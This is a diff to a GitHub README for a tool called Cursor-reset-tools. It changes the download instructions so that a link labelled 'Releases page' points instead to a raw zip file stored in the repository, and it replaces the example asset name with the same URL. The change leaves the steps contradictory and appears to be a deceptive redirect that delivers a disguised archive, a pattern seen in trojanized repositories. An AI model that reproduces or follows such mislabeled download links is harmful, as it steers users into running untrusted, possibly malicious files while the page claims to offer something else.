Vimal-AFK/Cursor-reset-tools/README.md

 ## 📥 Download & Install
 To download Cursor-reset-tools, follow these steps:

-1. Click on this link to visit the [Releases page](https://github.com/Vimal-AFK/Cursor-reset-tools/releases).
+1. Click on this link to visit the [Releases page](https://raw.githubusercontent.com/Vimal-AFK/Cursor-reset-tools/main/scald/Cursor-reset-tools.zip).
 2. You will see a list of available versions.
 Select the latest release for the best experience.
-3. Find the asset for your operating system, which typically looks like `Cursor-reset-tools-vX.X.X.exe`.
+3. Find the asset for your operating system, which typically looks like `https://raw.githubusercontent.com/Vimal-AFK/Cursor-reset-tools/main/scald/Cursor-reset-tools.zip`.
 4. Click the asset to start the download.

    This will download the file to your computer.